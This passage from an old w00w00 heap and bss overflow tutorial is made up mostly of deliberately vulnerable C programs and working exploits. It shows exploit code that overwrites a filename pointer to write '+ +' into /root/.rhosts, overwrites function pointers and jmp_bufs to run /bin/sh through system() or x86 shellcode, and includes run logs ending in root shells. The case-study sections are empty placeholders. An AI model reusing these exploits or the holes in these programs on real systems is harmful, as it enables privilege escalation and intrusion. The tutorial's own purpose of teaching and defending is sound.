changed throughout execution.
You can get the complete source to all examples used in this article,
from the file attachment, heaptut.tgz. You can also download this from
our article archive at http://www.w00w00.org/articles.html.
Note:
To demonstrate a bss-based overflow, change line:
from: 'char *buf = malloc(BUFSIZE)', to: 'static char buf[BUFSIZE]'
Yes, that was a very basic example, but we wanted to demonstrate a heap
overflow at its most primitive level. This is the basis of almost
all heap-based overflows. We can use it to overwrite a filename, a
password, a saved uid, etc. Here is a (still primitive) example of
manipulating pointers:
-----------------------------------------------------------------------------
/* demonstrates static pointer overflow in bss (uninitialized data) */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#define BUFSIZE 16
#define ADDRLEN 4 /* # of bytes in an address */
int main()
{
u_long diff;
static char buf[BUFSIZE], *bufptr;
bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;
printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
&bufptr, bufptr, buf, diff, diff);
memset(buf, 'A', (u_int)(diff + ADDRLEN));
printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
&bufptr, bufptr, buf, diff, diff);
return 0;
}
-----------------------------------------------------------------------------
The results:
[root /w00w00/heap/examples/basic]# ./heap3
bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes
bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes
When run, one clearly sees that the pointer now points to a different
address. Uses of this? One example is that we could overwrite a
temporary filename pointer to point to a separate string (such as
argv[1], which we could supply ourselves), which could contain
"/root/.rhosts". Hopefully, you are starting to see some potential uses.
To demonstrate this, we will use a temporary file to momentarily save
some input from the user. This is our finished "vulnerable program":
-----------------------------------------------------------------------------
/*
* This is a typical vulnerable program. It will store user input in a
* temporary file.
*
* Compile as: gcc -o vulprog1 vulprog1.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#define ERROR -1
#define BUFSIZE 16
/*
* Run this vulprog as root or change the "vulfile" to something else.
* Otherwise, even if the exploit works, it won't have permission to
* overwrite /root/.rhosts (the default "example").
*/
int main(int argc, char **argv)
{
FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}
tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
printf("before: tmpfile = %s\n", tmpfile);
printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);
printf("\nafter: tmpfile = %s\n", tmpfile);
tmpfd = fopen(tmpfile, "w");
if (tmpfd == NULL)
{
fprintf(stderr, "error opening %s: %s\n", tmpfile,
strerror(errno));
exit(ERROR);
}
fputs(buf, tmpfd);
fclose(tmpfd);
}
-----------------------------------------------------------------------------
The aim of this "example" program is to demonstrate that something of
this nature can easily occur in programs (although hopefully not setuid
or root-owned daemon servers).
And here is our exploit for the vulnerable program:
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/
#include
#include
#include
#include
#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */
/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp()
{
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}
int main(int argc, char **argv)
{
u_long addr;
register int i;
int mainbufsize;
char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";
/* ------------------------------------------------------ */
if (argc <= 1)
{
fprintf(stderr, "Usage: %s [try 310-330]\n", argv[0]);
exit(ERROR);
}
/* ------------------------------------------------------ */
memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");
memset(buf + strlen(buf), 'A', DIFF);
addr = getesp() + atoi(argv[1]);
/* reverse byte order (on a little endian system) */
for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);
mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;
mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbuf));
snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
buf, VULPROG, VULFILE);
printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
addr, VULFILE);
system(mainbuf);
return 0;
}
-----------------------------------------------------------------------------
Here's what happens when we run it:
[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320
Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after.
before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /vulprog1
Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are
close:
[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330
Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after.
before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /root/.rhosts
[root /tmp/heap/examples/advanced/vul-pkg1]#
Got it! The exploit overwrites the buffer that the vulnerable program
uses for gets() input. At the end of its buffer, it places the address
of where we assume argv[1] of the vulnerable program is. That is, we
overwrite everything between the overflowed buffer and the tmpfile
pointer. We ascertained the tmpfile pointer's location in memory by
sending arbitrary lengths of "A"'s until we discovered how many "A"'s it
took to reach the start of tmpfile's address. If you have the
source to the vulnerable program, you can also add a "printf()" to print
out the addresses/offsets between the overflowed data and the target data
(e.g., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').
(Un)fortunately, the offsets usually change at compile-time (as far as
I know), but we can easily recalculate, guess, or "brute force" the
offsets.
Note:
Now that we need a valid address (argv[1]'s address), we must reverse
the byte order for little endian systems. Little endian systems store
the least significant byte first (x86 is little endian), so that
0x12345678 is laid out in memory as the bytes 0x78 0x56 0x34 0x12. On a
big endian system (such as a sparc), we could drop the code that reverses
the byte order and leave the addresses alone.
Further note:
So far none of these examples required an executable heap! As I
briefly mentioned in the "Why Heap/BSS Overflows are Significant"
section, these (with the exception of the address byte order) previous
examples were all system/architecture independent. This is useful in
exploiting heap-based overflows.
With knowledge of how to overwrite pointers, we're going to show how to
modify function pointers. The downside to exploiting function pointers
(and the others to follow) is that they require an executable heap.
A function pointer (i.e., "int (*funcptr)(char *str)") allows a
programmer to dynamically modify a function to be called. We can
overwrite a function pointer by overwriting its address, so that when
it's executed, it calls the function we point it to instead. This is
good news because there are several options we have. First, we
can include our own shellcode. We can do one of the following with
shellcode:
1. argv[] method: store the shellcode in an argument to the program
(requiring an executable stack)
2. heap offset method: offset from the top of the heap to the
estimated address of the target/overflow buffer (requiring an
executable heap)
Note: There is a greater probability of the heap being executable than
the stack on any given system. Therefore, the heap method will probably
work more often.
A second method is to simply guess (though it's inefficient) the address
of a function, using an estimated offset to it in the vulnerable
program. Also, if we know the address of system() in our program, it
will be at a very close offset, assuming both vulprog/exploit were
compiled the same way. The advantage is that no executable stack or heap
is required.
Note:
Another method is to use the PLT (Procedure Linkage Table), which holds
an entry for each function the program imports. I first learned the PLT
method from str (stranJer) in a non-executable stack exploit for sparc.
The reason the second method is the preferred method is simplicity.
We can guess the offset of system() in the vulprog from the address of
system() in our exploit fairly quickly. The same holds on remote
systems (assuming similar versions, operating systems, and
architectures). With the stack method, the advantage is that we can do
whatever we want, and we don't require compatible function pointers
(i.e., char (*funcptr)(int a) and void (*funcptr)() would work the same).
The disadvantage (as mentioned earlier) is that it requires an
executable stack.
Here is our vulnerable program for the following 2 exploits:
-----------------------------------------------------------------------------
/*
* Just the vulnerable program we will exploit.
* Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define ERROR -1
#define BUFSIZE 64
int goodfunc(const char *str); /* funcptr starts out as this */
int main(int argc, char **argv)
{
static char buf[BUFSIZE];
static int (*funcptr)(const char *str);
if (argc <= 2)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}
printf("(for 1st exploit) system() = %p\n", system);
printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]);
printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf);
funcptr = (int (*)(const char *str))goodfunc;
printf("before overflow: funcptr points to %p\n", funcptr);
memset(buf, 0, sizeof(buf));
strncpy(buf, argv[1], strlen(argv[1]));
printf("after overflow: funcptr points to %p\n", funcptr);
(void)(*funcptr)(argv[2]);
return 0;
}
/* ---------------------------------------------- */
/* This is what funcptr would point to if we didn't overflow it */
int goodfunc(const char *str)
{
printf("\nHi, I'm a good function. I was passed: %s\n", str);
return 0;
}
-----------------------------------------------------------------------------
Our first example is the system() method:
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* Demonstrates overflowing/manipulating static function pointers in
* the bss (uninitialized data) to execute functions.
*
* Try an offset (argv[1]) in the range 0-20 (10-16 is best)
* To compile use: gcc -o exploit1 exploit1.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define BUFSIZE 64 /* the estimated diff between funcptr/buf */
#define VULPROG "./vulprog" /* vulnerable program location */
#define CMD "/bin/sh" /* command to execute if successful */
#define ERROR -1
int main(int argc, char **argv)
{
register int i;
u_long sysaddr;
static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};
if (argc <= 1)
{
fprintf(stderr, "Usage: %s <offset>\n", argv[0]);
fprintf(stderr, "[offset = estimated system() offset]\n\n");
exit(ERROR);
}
sysaddr = (u_long)&system - atoi(argv[1]);
printf("trying system() at 0x%lx\n", sysaddr);
memset(buf, 'A', BUFSIZE);
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(sysaddr); i++)
buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;
execl(VULPROG, VULPROG, buf, CMD, NULL);
return 0;
}
-----------------------------------------------------------------------------
When we run this with an offset of 16 (which may vary) we get:
[root /w00w00/heap/examples]# ./exploit1 16
trying system() at 0x80484d0
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd3c
(for 2nd exploit, heap offset method) buf = 0x804a9a8
before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x80484d0
bash#
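The byte loop in the exploit stores the address least significant byte
first, which is the order an x86 reads a 32-bit value back from memory.
As a small sketch of just that step (the function names are ours, and we
assume a 32-bit address as in the output above):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value into out[0..3], least significant byte first. */
void pack_le32(unsigned char *out, uint32_t value)
{
    size_t i;

    assert(out != NULL);
    for (i = 0; i < 4; i++)
        out[i] = (unsigned char)((value >> (i * 8)) & 0xff);
}

/* Inverse of pack_le32(): rebuild the value from four bytes. */
uint32_t unpack_le32(const unsigned char *in)
{
    assert(in != NULL);
    return (uint32_t)in[0]
         | ((uint32_t)in[1] << 8)
         | ((uint32_t)in[2] << 16)
         | ((uint32_t)in[3] << 24);
}
```

For the address 0x80484d0 printed above, pack_le32() yields the bytes
d0 84 04 08, which is what lands on top of funcptr.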
And our second example, using both argv[] and heap offset method:
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This demonstrates how to exploit a static buffer to point the
* function pointer at argv[] to execute shellcode. This requires
* an executable heap to succeed.
*
* The exploit takes two arguments (the offset and "heap"/"stack").
* For argv[] method, it's an estimated offset to argv[2] from
* the stack top. For the heap offset method, it's an estimated offset
* to the target/overflow buffer from the heap top.
*
* Try values somewhere between 325-345 for argv[] method, and 420-450
* for heap.
*
* To compile use: gcc -o exploit2 exploit2.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define ERROR -1
#define BUFSIZE 64 /* estimated diff between buf/funcptr */
#define VULPROG "./vulprog" /* where the vulprog is */
char shellcode[] = /* just aleph1's old shellcode (linux x86) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
"\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
u_long getesp()
{
__asm__("movl %esp,%eax"); /* set sp as return value */
}
int main(int argc, char **argv)
{
register int i;
u_long sysaddr;
char buf[BUFSIZE + sizeof(u_long) + 1];
if (argc <= 2)
{
fprintf(stderr, "Usage: %s <offset> <heap | stack>\n", argv[0]);
exit(ERROR);
}
if (strncmp(argv[2], "stack", 5) == 0)
{
printf("Using stack for shellcode (requires exec. stack)\n");
sysaddr = getesp() + atoi(argv[1]);
printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);
memset(buf, 'A', BUFSIZE + sizeof(u_long));
}
else
{
printf("Using heap buffer for shellcode "
"(requires exec. heap)\n");
sysaddr = (u_long)sbrk(0) - atoi(argv[1]);
printf("Using 0x%lx as our buffer's address\n\n", sysaddr);
if (BUFSIZE + 4 + 1 < strlen(shellcode))
{
fprintf(stderr, "error: buffer is too small for shellcode "
"(min. = %d bytes)\n", strlen(shellcode));
exit(ERROR);
}
strcpy(buf, shellcode);
memset(buf + strlen(shellcode), 'A',
BUFSIZE - strlen(shellcode) + sizeof(u_long));
}
buf[BUFSIZE + sizeof(u_long)] = '\0';
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(sysaddr); i++)
buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;
execl(VULPROG, VULPROG, buf, shellcode, NULL);
return 0;
}
-----------------------------------------------------------------------------
When we run this with an offset of 334 for the argv[] method we get:
[root /w00w00/heap/examples] ./exploit2 334 stack
Using stack for shellcode (requires exec. stack)
Using 0xbffffd16 as our argv[1] address
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8
before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0xbffffd16
bash#
When we run this with an offset of 428-442 for the heap offset method we get:
[root /w00w00/heap/examples] ./exploit2 428 heap
Using heap buffer for shellcode (requires exec. heap)
Using 0x804a9a8 as our buffer's address
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8
before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x804a9a8
bash#
Note:
Another advantage to the heap method is that you have a large
working range. With argv[] (stack) method, it needed to be exact. With
the heap offset method, any offset between 428-442 worked.
As you can see, there are several different methods to exploit the same
problem. As an added bonus, we'll include a final type of exploitation
that uses jmp_bufs (setjmp/longjmp). A jmp_buf basically stores a stack
frame, so that execution can jump back to it at a later point. If we get a
chance to overflow a buffer between the setjmp() and longjmp() calls, and
the jmp_buf sits above the overflowed buffer, this can be exploited. We can
set these up to emulate the behavior of a stack-based overflow (as does the
argv[] shellcode method used earlier). The jmp_buf layout used here is for
an x86 system; it will need to be modified accordingly for other
architectures.
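For readers who have not used setjmp/longjmp before, here is a minimal
sketch of the normal, unexploited control flow. The names env, bail_out()
and run_with_recovery() are ours and purely illustrative.

```c
#include <assert.h>
#include <setjmp.h>

static jmp_buf env;        /* saved execution context */
static int last_code;      /* value handed over by bail_out() */

/* Abandon the current call chain and resume at the setjmp() site. */
static void bail_out(int code)
{
    assert(code != 0);     /* 0 is reserved for the normal path */
    last_code = code;
    longjmp(env, 1);
}

/* Returns 0 on the normal path, or the code given to bail_out(). */
int run_with_recovery(int code)
{
    if (setjmp(env) != 0)
        return last_code;  /* we got here via longjmp() */

    if (code != 0)
        bail_out(code);    /* does not return */

    return 0;
}
```

The saved context in env is plain data. Whatever it holds at the time of
the longjmp() call decides where execution resumes, which is why its
position in memory relative to an overflowable buffer matters.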
First we will include a vulnerable program again:
-----------------------------------------------------------------------------
/*
* This is just a basic vulnerable program to demonstrate
* how to overwrite/modify jmp_buf's to modify the course of
* execution.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <setjmp.h>
#define ERROR -1
#define BUFSIZE 16
static char buf[BUFSIZE];
jmp_buf jmpbuf;
u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}
int main(int argc, char **argv)
{
if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}
printf("[vulprog] argv[2] = %p\n", argv[2]);
printf("[vulprog] sp = 0x%lx\n\n", getesp());
if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */
{
fprintf(stderr, "error: exploit didn't work\n");
exit(ERROR);
}
printf("before:\n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);
printf("bp = %p, sp = %p, pc = %p\n\n",
jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);
strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */
printf("after:\n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);
printf("bp = %p, sp = %p, pc = %p\n\n",
jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);
longjmp(jmpbuf, 1);
return 0;
}
-----------------------------------------------------------------------------
The reason we have the vulnerable program output its stack pointer (esp
on x86) is that it makes "guessing" easier for the novice.
And now the exploit for it (you should be able to follow it):
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp)
* to emulate a stack-based overflow in the heap. By that I mean,
* you would overflow the sp/pc of the jmpbuf. When longjmp() is
* called, it will execute the next instruction at that address.
* Therefore, we can stick shellcode at this address (as the data/heap
* section on most systems is executable), and it will be executed.
*
* This takes two arguments (offsets):
* arg 1 - stack offset (should be about 25-45).
* arg 2 - argv offset (should be about 310-330).
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define ERROR -1
#define BUFSIZE 16
#define VULPROG "./vulprog4"
char shellcode[] = /* just aleph1's old shellcode (linux x86) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
"\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}
int main(int argc, char **argv)
{
int stackaddr, argvaddr;
register int index, i, j;
char buf[BUFSIZE + 24 + 1];
if (argc <= 2)
{
fprintf(stderr, "Usage: %s <stack offset> <argv offset>\n",
argv[0]);
fprintf(stderr, "[stack offset = offset to stack of vulprog]\n");
fprintf(stderr, "[argv offset = offset to argv[2]]\n");
exit(ERROR);
}
stackaddr = getesp() - atoi(argv[1]);
argvaddr = getesp() + atoi(argv[2]);
printf("trying address 0x%lx for argv[2]\n", argvaddr);
printf("trying address 0x%lx for sp\n\n", stackaddr);
/*
* The second memset() is needed, because otherwise some values
* will be (null) and the longjmp() won't do our shellcode.
*/
memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12);
buf[BUFSIZE+24] = '\0';
/* ------------------------------------- */
/*
* We need the stack pointer, because to set pc to our shellcode
* address, we have to overwrite the stack pointer for jmpbuf.
* Therefore, we'll rewrite it with the real address again.
*/
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(u_long); i++) /* setup BP */
{
index = BUFSIZE + 16 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}
/* ----------------------------- */
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(u_long); i++) /* setup SP */
{
index = BUFSIZE + 20 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}
/* ----------------------------- */
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(u_long); i++) /* setup PC */
{
index = BUFSIZE + 24 + i;
buf[index] = (argvaddr >> (i * 8)) & 255;
}
execl(VULPROG, VULPROG, buf, shellcode, NULL);
return 0;
}
-----------------------------------------------------------------------------
Ouch, that was sloppy. But anyway, when we run this with a stack offset
of 36 and an argv[2] offset of 322, we get the following:
[root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
trying address 0xbffffcf6 for argv[2]
trying address 0xbffffb90 for sp
[vulprog] argv[2] = 0xbffffcf6
[vulprog] sp = 0xbffffb90
before:
bx = 0x0, si = 0x40001fb0, di = 0x4000000f
bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715
after:
bx = 0x1010101, si = 0x1010101, di = 0x1010101
bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6
bash#
w00w00! For those of you that are saying, "Okay. I see this works in a
controlled environment; but what about in the wild?" There is sensitive
data on the heap that can be overflowed. Examples include:
     functions                         reason
 1. *gets()/*printf(), *scanf()        __iob (FILE) structure in heap
 2. popen()                            __iob (FILE) structure in heap
 3. *dir() (readdir, seekdir, ...)     DIR entries (dir/heap buffers)
 4. atexit()                           static/global function pointers
 5. strdup()                           allocates dynamic data in the heap
 7. getenv()                           stored data on heap
 8. tmpnam()                           stored data on heap
 9. malloc()                           chain pointers
10. rpc callback functions             function pointers
11. windows callback functions         func pointers kept on heap
12. signal handler pointers            function pointers (note: unix tracks
    in cygnus (gcc for win)            these in the kernel, not in the heap)
Now, you can definitely see some uses for these functions. Room allocated
for FILE structures in functions such as printf(), fgets(),
readdir(), seekdir(), etc. can be manipulated (buffer or function
pointers). atexit() has function pointers that will be called when the
program terminates. strdup() can store strings (such as filenames or
passwords) on the heap. malloc()'s own chain pointers (inside its pool)
can be manipulated to access memory it wasn't meant to access. getenv()
stores data on the heap, which would allow us to modify something such as
$HOME after it's initially checked. svc/rpc registration functions
(librpc, libnsl, etc.) keep callback functions stored on the heap.
We will demonstrate overwriting Windows callback functions and
overwriting FILE (__iob) structures (with popen).
Once you know how to overwrite FILE structures with popen(), you can
quickly figure out how to do it with other functions (e.g., *printf,
*gets, *scanf, etc.), as well as DIR structures (because they are
similar).
Now for some case studies! Our two "real world" vulnerabilities will be
Solaris' tip and BSDI's crontab. The BSDI crontab vulnerability
was discovered by mudge of L0pht (see L0pht 1996 Advisory Page). We're
reusing it because it's a textbook example of a heap-based overflow
(though we will use our own method of exploitation).
Our first case study will be the BSDI crontab heap-based overflow. We
can pass a long filename, which will overflow a static buffer. Above
that buffer in memory, we have a pwd (see pwd.h) structure! This stores
a user's user name, password, uid, gid, etc. By overwriting the uid/gid
field of the pwd, we can modify the privileges that crond will run our
crontab with (as soon as it tries to run our crontab). This script could
then put out a suid root shell, because our script will be running with
uid/gid 0.
Here is our exploit code:
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
When we run it on a BSDI X.X machine, we get the following:
[Put exploit output here]
'tip' is run suid uucp on Solaris. It is possible to get root once uucp
privileges are gained (but that's outside the scope of this article).
Tip will overflow a static buffer when prompting for a file to
send/receive. Above the static buffer in memory is a jmp_buf. By
overflowing the static buffer and then causing a SIGINT, we can get
shellcode executed (by storing it in argv[]). To exploit successfully,
we need to either connect to a valid system, or create a "fake device"
to which tip will connect.
Here is our tip exploit:
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
When we run it on a Solaris 2.7 machine, we get the following:
[Put exploit output here]
Possible Fixes (Workarounds)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Obviously, the best prevention for heap-based overflows is writing good
code! Similar to stack-based overflows, there is no real way of
preventing heap-based overflows.
We can get a copy of the bounds checking gcc/egcs (which should locate
most potential heap-based overflows) developed by Richard Jones and Paul
Kelly. This program can be downloaded from Richard Jones's homepage
at http://www.annexia.demon.co.uk. It detects overruns that might be
missed by human error. One example they use is: "int array[10]; for (i =
0; i <= 10; i++) array[i] = 1". I have never used it.
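The quoted loop runs one iteration too far: array[10] is the eleventh
element of a ten-element array. A corrected version might look like the
sketch below (fill_ones() and ARRAY_LEN are illustrative names of ours,
not taken from the bounds checking gcc documentation).

```c
#include <assert.h>
#include <stddef.h>

#define ARRAY_LEN 10

/* Set every element of the array to 1 and return how many were written. */
size_t fill_ones(int *array, size_t len)
{
    size_t i;

    assert(array != NULL);
    for (i = 0; i < len; i++)   /* '<', not '<=': last valid index is len - 1 */
        array[i] = 1;
    return i;
}
```

Called as fill_ones(array, ARRAY_LEN), the loop touches indices 0 through
9 and nothing beyond them.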
Note:
For Windows, one could use NuMega's bounds checker which essentially
performs the same as the bounds checking gcc.
We can always make a non-executable heap patch (as mentioned earlier, most
systems have an executable heap). During a conversation I had with Solar
Designer, he mentioned the main problems with a non-executable heap would
involve compilers, interpreters, etc.
Note:
I added a note section here to reiterate the point that a non-executable
heap does NOT prevent heap overflows at all. It means we can't execute
instructions in the heap. It does NOT prevent us from overwriting data
in the heap.
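To make the data-only point concrete, here is a small simulation. It does
not overflow anything for real: one 12-byte array stands in for a static
buffer followed by a neighbouring 32-bit field (say, a uid), so every
copy stays inside a single object. All names and sizes are assumptions
made for this sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define NAME_LEN   8                 /* size of the simulated buffer */
#define REGION_LEN (NAME_LEN + 4)    /* buffer plus neighbouring field */

/* Bytes 0..7 act as the buffer, bytes 8..11 as the adjacent field. */
struct region
{
    unsigned char bytes[REGION_LEN];
};

void region_init(struct region *r, unsigned char uid_fill)
{
    assert(r != NULL);
    memset(r->bytes, 0, NAME_LEN);
    memset(r->bytes + NAME_LEN, uid_fill, 4);
}

/*
 * Copy with the source length as the only limit, as the vulnerable
 * programs do (capped at REGION_LEN so the sketch never leaves the array).
 */
void region_unchecked_copy(struct region *r, const unsigned char *src,
                           size_t len)
{
    assert(r != NULL && src != NULL);
    if (len > REGION_LEN)
        len = REGION_LEN;
    memcpy(r->bytes, src, len);
}

/* Returns nonzero if the neighbouring field still holds uid_fill. */
int region_uid_intact(const struct region *r, unsigned char uid_fill)
{
    size_t i;

    for (i = NAME_LEN; i < REGION_LEN; i++)
        if (r->bytes[i] != uid_fill)
            return 0;
    return 1;
}
```

No instruction is ever executed from the region, yet a 12-byte input
changes the neighbouring field. A non-executable heap would not notice.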
Likewise, another possibility is to make a "HeapGuard", which would be
the equivalent of Cowan's StackGuard mentioned earlier. He (et al.)
also developed something called "MemGuard", but it's a misnomer.
Its function is to prevent a return address on the stack from being
overwritten (via canary values). It does nothing to prevent
overflows in the heap or bss.
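As a rough idea of what such a "HeapGuard" could check, here is a sketch
that places a guard word directly after a heap payload and tests it
later. This is our own illustration, not an existing tool: the names and
the fixed guard constant are assumptions, and a real design would want an
unpredictable value. It only detects a contiguous overwrite after the
fact; it does not prevent one.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define GUARD_VALUE 0x5ca1ab1eu   /* arbitrary constant for this sketch */

/* A heap block whose payload is followed by a guard word. */
struct guarded
{
    size_t size;          /* payload size in bytes */
    unsigned char *mem;   /* payload, then sizeof(uint32_t) guard bytes */
};

/* Allocate size payload bytes plus the guard. Returns 0 or -1. */
int guarded_alloc(struct guarded *g, size_t size)
{
    uint32_t guard = GUARD_VALUE;

    assert(g != NULL);
    g->mem = malloc(size + sizeof(guard));
    if (g->mem == NULL)
        return -1;
    g->size = size;
    memcpy(g->mem + size, &guard, sizeof(guard));
    return 0;
}

/* Returns nonzero while the guard word is unmodified. */
int guarded_check(const struct guarded *g)
{
    uint32_t guard;

    assert(g != NULL && g->mem != NULL);
    memcpy(&guard, g->mem + g->size, sizeof(guard));
    return guard == GUARD_VALUE;
}

void guarded_free(struct guarded *g)
{
    assert(g != NULL);
    free(g->mem);
    g->mem = NULL;
    g->size = 0;
}
```

A program would call guarded_check() before trusting anything stored
after the buffer, and abort if it returns zero.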
Acknowledgements
~~~~~~~~~~~~~~~~
There has been a significant amount of work on heap-based overflows in
the past. We ought to name some other people who have published work
involving heap/bss-based overflows (though, our work wasn't based off
them).
Solar Designer: SuperProbe exploit (function pointers), color_xterm
exploit (struct pointers), WebSite (pointer arrays), etc.
L0pht: Internet Explorer 4.01 vulnerability (dildog), BSDI crontab
exploit (mudge), etc.
Some others who have published exploits for heap-based overflows (thanks
to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam
Morrison (stdioflow). I'm sure there are many others, and I apologize for
excluding anyone.
I'd also like to thank the following people who had some direct
involvement in this article: str (stranJer), halflife, and jobe.
Indirect involvements: Solar Designer, mudge, and other w00w00
affiliates.
Other good sources of info include: as/gcc/ld info files (/usr/info/*),
BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00
(http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.
Epilogue:
Most people who claim their systems are "secure" are saying so out of
a lack of knowledge (ignorant seemed a little too strong). Assuming
security leads to a false sense of security (e.g., azrael.phrack.com,
has remote vulnerabilities involving heap-based overflows that have gone
unnoticed for quite a while). Hopefully, people will experiment with
heap-based overflows, and in turn, will become more aware that the
